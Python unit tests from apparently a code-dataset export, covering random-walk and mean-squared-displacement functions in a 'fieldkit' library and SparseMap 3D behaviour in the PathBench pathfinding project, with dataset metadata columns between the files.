self.assertTrue(np.all(im >= -3))
self.assertTrue(np.all(im < 3))
# check that trajectory is continuous (no step is larger than 1)
# 0->1
self.assertLessEqual(np.max(traj[1]-traj[0]), 1)
self.assertGreaterEqual(np.min(traj[1]-traj[0]), -1)
# 1->2
self.assertLessEqual(np.max(traj[2]-traj[1]), 1)
self.assertGreaterEqual(np.min(traj[2]-traj[1]), -1)
# 2->3
self.assertLessEqual(np.max(traj[3]-traj[2]), 1)
self.assertGreaterEqual(np.min(traj[3]-traj[2]), -1)
# try to restart from last state
traj2,_,_ = fieldkit.simulate.random_walk(domain, N=2, steps=1, runs=1, coords=x, images=im)
# first frame should match old coordinates
np.testing.assert_array_equal(traj2[0], x + im*mesh.shape)
# difference between last old and first new should be 1 step at most
self.assertLessEqual(np.max(traj2[0]-traj[-1]), 1)
self.assertGreaterEqual(np.min(traj2[0]-traj[-1]), -1)
def test_msd(self):
""" Validate random walk with a short simulation, computing the MSD.
The simulation is constructed so that the MSD = 1 for each component after 1 run.
"""
mesh = fieldkit.Mesh().from_lattice(N=10, lattice=fieldkit.HOOMDLattice(L=10.0))
field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape))
domain = fieldkit.domain.digitize(field, threshold=0.5)
# displacement should be consistent with random walk
traj,_,_ = fieldkit.simulate.random_walk(domain, N=4000, steps=3, runs=1000)
window = 3
msd = np.zeros((window+1,3))
samples = np.zeros(window+1, dtype=np.int32)
for i,ri in enumerate(traj[:-1]):
for dt in range(1,min(window+1,traj.shape[0]-i)):
rj = traj[i+dt]
dr = rj-ri
msd[dt] += np.mean(dr*dr,axis=0)
samples[dt] += 1
flags = samples > 0
for ax in range(3):
msd[flags,ax] /= samples[flags]
np.testing.assert_array_almost_equal(msd[0], (0.,0.,0.), decimal=3)
np.testing.assert_array_almost_equal(msd[1], (1.,1.,1.), decimal=3)
np.testing.assert_array_almost_equal(msd[2], (2.,2.,2.), decimal=2)
np.testing.assert_array_almost_equal(msd[3], (3.,3.,3.), decimal=2)
# use compiled code to test farther out
msd_2 = fieldkit.simulate.msd(traj,window=window)
self.assertEqual(msd_2.shape, (window+1,3))
np.testing.assert_array_almost_equal(msd_2[0], (0.,0.,0.), decimal=3)
np.testing.assert_array_almost_equal(msd_2[1], (1.,1.,1.), decimal=3)
np.testing.assert_array_almost_equal(msd_2[2], (2.,2.,2.), decimal=2)
np.testing.assert_array_almost_equal(msd_2[3], (3.,3.,3.), decimal=2)
# both results should be essentially the same
np.testing.assert_array_almost_equal(msd,msd_2)
# use every 2nd origin with a looser tolerance due to lower stats
msd_3 = fieldkit.simulate.msd(traj,window=window,every=2)
self.assertEqual(msd_3.shape, (window+1,3))
np.testing.assert_array_almost_equal(msd_3[0], (0.,0.,0.), decimal=3)
np.testing.assert_array_almost_equal(msd_3[1], (1.,1.,1.), decimal=2)
np.testing.assert_array_almost_equal(msd_3[2], (2.,2.,2.), decimal=2)
np.testing.assert_array_almost_equal(msd_3[3], (3.,3.,3.), decimal=2)
def test_msd_binned(self):
""" Test binned MSD compared to bulk MSD calculator.
The simulation is constructed so that the MSD = 1 for each component after 1 run.
"""
# dummy trajectory
traj = np.zeros((4,3,3))
traj[0,:] = [[0,0,0],[-1.9, 0, 0],[1.5,3,7]]
traj[1,:] = [[0.1,2,-1],[-1.8,-1,3],[1.6,4,8]]
traj[2,:] = [[0.2,4,-2],[-1.7,-2,6],[1.7,5,9]]
traj[3,:] = [[0.3,6,-3],[-1.6,-3,9],[1.8,6,10]]
# msd from binned
msd_bin,edges = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,3))
self.assertEqual(edges.shape, (9,))
np.testing.assert_array_almost_equal(edges,(-2.,-1.5,-1.0,-0.5,0.,0.5,1.0,1.5,2.0))
# only bins 0, 4, and 7 have particles contributing
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,1.,9.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.e-2,4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.e-2,1.,1.)))
# repeat using every other origin, should give identical result
msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=8, range=(-2,2), every=2)
self.assertEqual(msd_bin.shape, (8,2,3))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,1.,9.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.e-2,4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.e-2,1.,1.)))
# compute with a range that no particles lie in, should give all zeros
msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=1, range=(-1.5,-0.1))
self.assertEqual(msd_bin.shape, (1,2,3))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(0.,0.,0.)))
# repeat for the window that only the first particle lies in
msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=3, range=(0,0.6))
self.assertEqual(msd_bin.shape, (3,2,3))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(1.e-2,4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.)))
# roll the trajectory so binning is done along y
traj = np.roll(traj, shift=1, axis=2)
msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=1, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,3))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(9.,1.e-2,1.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.,1.e-2,4.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.,1.e-2,1.)))
# roll again so binning is done along z
traj = np.roll(traj, shift=1, axis=2)
msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=2, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,3))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.,9.,1.e-2)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(4.,1.,1.e-2)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.,1.,1.e-2)))
def test_msd_survival(self):
""" Test binned MSD compared to bulk MSD calculator.
The simulation is constructed so that the MSD = 1 for each component after 1 run.
"""
# dummy trajectory
traj = np.zeros((4,3,3))
traj[0,:] = [[0,0,0],[-1.9, 0, 0],[1.5,3,7]]
traj[1,:] = [[0.1,2,-1],[-1.8,-1,3],[1.6,4,8]]
traj[2,:] = [[0.2,4,-2],[-1.7,-2,6],[1.7,5,9]]
traj[3,:] = [[0.3,6,-3],[-1.6,-3,9],[1.8,6,10]]
# msd from binned
msd_bin,counts,edges = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,2))
self.assertEqual(counts.shape, (8,2))
self.assertEqual(edges.shape, (9,))
np.testing.assert_array_almost_equal(edges,(-2.,-1.5,-1.0,-0.5,0.,0.5,1.0,1.5,2.0))
# check counts
np.testing.assert_array_equal(counts[0], (3,3))
np.testing.assert_array_equal(counts[1], (0,0))
np.testing.assert_array_equal(counts[2], (0,0))
np.testing.assert_array_equal(counts[3], (0,0))
np.testing.assert_array_equal(counts[4], (3,3))
np.testing.assert_array_equal(counts[5], (0,0))
np.testing.assert_array_equal(counts[6], (0,0))
np.testing.assert_array_equal(counts[7], (3,3))
# only bins 0, 4, and 7 have particles contributing
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.)))
# repeat using every other origin, should give identical result
msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=8, range=(-2,2), every=2)
self.assertEqual(msd_bin.shape, (8,2,2))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.)))
# compute with a range that no particles lie in, should give all zeros
msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=1, range=(-1.5,-0.1))
self.assertEqual(msd_bin.shape, (1,2,2))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(0.,0.)))
# roll the trajectory so binning is done along y
traj = np.roll(traj, shift=1, axis=2)
msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=1, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,2))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(9.,1.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(1.,4.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.)))
# roll again so binning is done along z
traj = np.roll(traj, shift=1, axis=2)
msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=2, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,2))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.)))
# TODO: test when a particle exits the bin
def test_msd_survival_cylinder(self):
""" Test radially binned MSD."""
# dummy radial and axial coordinates
r = np.zeros((4,3))
r[0,:] = [0.0,1.5,2.5]
r[1,:] = [0.3,1.3,2.5]
r[2,:] = [0.6,1.1,2.5]
r[3,:] = [0.9,1.01,2.5]
# 0 has D = 1, 1 has D = 2, 2 has D = 3
z = np.zeros((4,3))
z[0,:] = [1,-2,0]
z[1,:] = [2,-4,3]
z[2,:] = [3,-6,6]
z[3,:] = [4,-8,9]
# msd from binned
msd_bin,counts,edges = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=4, range=(0,4))
self.assertEqual(msd_bin.shape, (4,2))
self.assertEqual(counts.shape, (4,2))
self.assertEqual(edges.shape, (5,))
np.testing.assert_array_almost_equal(edges,(0,1,2,3,4))
# check counts
np.testing.assert_array_equal(counts[0], (3,3))
np.testing.assert_array_equal(counts[1], (3,3))
np.testing.assert_array_equal(counts[2], (3,3))
np.testing.assert_array_equal(counts[3], (0,0))
# only bins 0, 1, and 2 have particles contributing
np.testing.assert_array_almost_equal(msd_bin[0], (0,1))
np.testing.assert_array_almost_equal(msd_bin[1], (0,4))
np.testing.assert_array_almost_equal(msd_bin[2], (0,9))
np.testing.assert_array_almost_equal(msd_bin[3], (0,0))
# repeat using every other origin, should give identical result
msd_bin,_,_ = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=4, range=(0,4), every=2)
self.assertEqual(msd_bin.shape, (4,2))
np.testing.assert_array_almost_equal(msd_bin[0], (0,1))
np.testing.assert_array_almost_equal(msd_bin[1], (0,4))
np.testing.assert_array_almost_equal(msd_bin[2], (0,9))
np.testing.assert_array_almost_equal(msd_bin[3], (0,0))
# shring range to lose inner and outer particle
msd_bin,_,_ = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=2, range=(1,3))
self.assertEqual(msd_bin.shape, (2,2))
np.testing.assert_array_almost_equal(msd_bin[0], (0,4))
np.testing.assert_array_almost_equal(msd_bin[1], (0,9))
| 52.37224
| 107
| 0.604265
| 2,793
| 16,602
| 3.417472
| 0.07304
| 0.054479
| 0.052174
| 0.226296
| 0.833002
| 0.792666
| 0.760922
| 0.735987
| 0.70571
| 0.698271
| 0
| 0.076228
| 0.19323
| 16,602
| 316
| 108
| 52.537975
| 0.636404
| 0.128238
| 0
| 0.467593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003165
| 0.671296
| 1
| 0.023148
| false
| 0
| 0.013889
| 0
| 0.041667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cbd12c26351b0f5435c2e5ad6b4aa0d871f5d94c
| 12,732
|
py
|
Python
|
tests/test_maps/test_sparse_3d.py
|
ed741/PathBench
|
50fe138eb1f824f49fe1a862705e435a1c3ec3ae
|
[
"BSD-3-Clause"
] | 46
|
2020-12-25T04:09:15.000Z
|
2022-03-25T12:32:42.000Z
|
tests/test_maps/test_sparse_3d.py
|
ed741/PathBench
|
50fe138eb1f824f49fe1a862705e435a1c3ec3ae
|
[
"BSD-3-Clause"
] | 36
|
2020-12-21T16:10:02.000Z
|
2022-01-03T01:42:01.000Z
|
tests/test_maps/test_sparse_3d.py
|
judicaelclair/PathBenchURO
|
101e67674efdfa8e27e1cf7787dac9fdf99552fe
|
[
"BSD-3-Clause"
] | 11
|
2021-01-06T23:34:12.000Z
|
2022-03-21T17:21:47.000Z
|
import unittest
import copy
from unittest.mock import Mock
from algorithms.configuration.entities.agent import Agent
from algorithms.configuration.entities.goal import Goal
from algorithms.configuration.entities.obstacle import Obstacle
from algorithms.configuration.entities.trace import Trace
from algorithms.configuration.maps.dense_map import DenseMap
from algorithms.configuration.maps.sparse_map import SparseMap
from maps.maps import Maps
from simulator.services.debug import DebugLevel
from simulator.services.services import Services
from structures import Size, Point
class TestSparseMap3D(unittest.TestCase):
def test_copy(self) -> None:
map1: SparseMap = Maps.pixel_map_one_obstacle_3d
map2: SparseMap = copy.copy(map1)
self.assertEqual(map1, map2)
def test_deep_copy(self) -> None:
map1: SparseMap = Maps.pixel_map_one_obstacle_3d
map2: SparseMap = copy.deepcopy(map1)
self.assertEqual(map1, map2)
def test_eq(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
self.assertEqual(map1, map2)
def test_ne_size(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(400, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
self.assertNotEqual(map1, map2)
def test_ne_agent(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 10, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
self.assertNotEqual(map1, map2)
def test_ne_goal(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 120, 120), 10))
self.assertNotEqual(map1, map2)
def test_ne_obstacle(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(90, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
self.assertNotEqual(map1, map2)
def test_ne_all(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(100, 200, 200),
Agent(Point(15, 20, 20), 10),
[Obstacle(Point(40, 30, 40), 10), Obstacle(Point(100, 90, 100), 40)],
Goal(Point(180, 150, 120), 10))
self.assertNotEqual(map1, map2)
def test_ne_dense(self) -> None:
map1: SparseMap = SparseMap(Size(20, 20, 20),
Agent(Point(2, 2, 2), 1),
[Obstacle(Point(4, 4, 4), 1), Obstacle(Point(10, 10, 10), 4)],
Goal(Point(18, 16, 14), 1))
map2: DenseMap = SparseMap(Size(20, 20, 20),
Agent(Point(2, 2, 2), 1),
[Obstacle(Point(4, 4, 4), 1), Obstacle(Point(10, 10, 10), 4)],
Goal(Point(18, 16, 14), 1)).convert_to_dense_map()
self.assertNotEqual(map1, map2)
def test_ne_instance(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: int = 2
self.assertNotEqual(map1, map2)
def test_eq_dense_map(self) -> None:
map1: DenseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
])
map2: SparseMap = SparseMap(
Size(3, 2, 2),
Agent(Point(0, 1, 0)),
[Obstacle(Point(1, 0, 1)), Obstacle(Point(2, 0, 1))],
Goal(Point(2, 1, 1))
)
self.assertEqual(map2, map1)
def test_convert_to_dense_map(self) -> None:
map1: SparseMap = SparseMap(
Size(3, 2, 2),
Agent(Point(0, 1, 0)),
[Obstacle(Point(1, 0, 1)), Obstacle(Point(2, 0, 1))],
Goal(Point(2, 1, 1))
)
map2: DenseMap = map1.convert_to_dense_map()
self.assertEqual(map1, map2)
def test_move_agent_normal(self) -> None:
map1: DenseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
map1.move_agent(Point(0, 0, 0))
self.assertEqual(Point(0, 0, 0), map1.agent.position)
self.assertTrue([Trace(Point(0, 0, 0))], map1.trace)
def test_move_agent_no_trace(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
map1.move_agent(Point(0, 0, 0), True)
self.assertEqual(Point(0, 0, 0), map1.agent.position)
self.assertEqual([], map1.trace)
def test_move_agent_out_of_bounds(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
map1.move_agent(Point(-1, 0, 0))
self.assertEqual(Point(0, 1, 0), map1.agent.position)
self.assertEqual([Trace(Point(0, 1, 0))], map1.trace)
def test_is_goal_reached_normal(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertTrue(map1.is_goal_reached(Point(2, 1, 1)))
def test_is_goal_reached_false(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertFalse(map1.is_goal_reached(Point(2, 1, 0)))
def test_is_goal_reached_out_of_bounds(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertFalse(map1.is_goal_reached(Point(-1, -1, -1)))
def test_is_valid_position_normal(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertTrue(map1.is_agent_valid_pos(Point(0, 0, 0)))
self.assertTrue(map1.is_agent_valid_pos(Point(1, 0, 0)))
self.assertTrue(map1.is_agent_valid_pos(Point(2, 0, 0)))
self.assertTrue(map1.is_agent_valid_pos(Point(0, 0, 1)))
def test_is_valid_position_invalid(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertFalse(map1.is_agent_valid_pos(Point(1, 0, 1)))
self.assertFalse(map1.is_agent_valid_pos(Point(-1, -1, -1)))
def test_str(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertEqual("""SparseMap: {
size: Size(3, 2, 2),
agent: Agent: {position: Point(0, 1, 0), radius: 0},
obstacles: {
size: 2,
entities: [
Obstacle: {position: Point(1, 0, 1), radius: 0},
Obstacle: {position: Point(2, 0, 1), radius: 0},
]
},
goal: Goal: {position: Point(2, 1, 1), radius: 0}
}""", str(map1))
def test_str_debug_level_3(self) -> None:
service: Services = Mock()
service.settings.simulator_write_debug_level = DebugLevel.HIGH
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
map1._services = service
self.assertEqual("""SparseMap: {
size: Size(3, 2, 2),
agent: Agent: {position: Point(0, 1, 0), radius: 0},
obstacles: {
size: 2,
entities: [
Obstacle: {position: Point(1, 0, 1), radius: 0},
Obstacle: {position: Point(2, 0, 1), radius: 0},
]
},
goal: Goal: {position: Point(2, 1, 1), radius: 0}
}""", str(map1))
| 52.395062
| 131
| 0.570924
| 1,584
| 12,732
| 4.416667
| 0.060606
| 0.172956
| 0.188679
| 0.289308
| 0.873928
| 0.84677
| 0.801458
| 0.783877
| 0.783591
| 0.763722
| 0
| 0.096882
| 0.292256
| 12,732
| 242
| 132
| 52.61157
| 0.679503
| 0
| 0
| 0.623256
| 0
| 0
| 0.048539
| 0
| 0
| 0
| 0
| 0
| 0.134884
| 1
| 0.102326
| false
| 0
| 0.060465
| 0
| 0.167442
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1de2cad401e2afd795db2942e7f9a1042c30c846
| 24,933
|
py
|
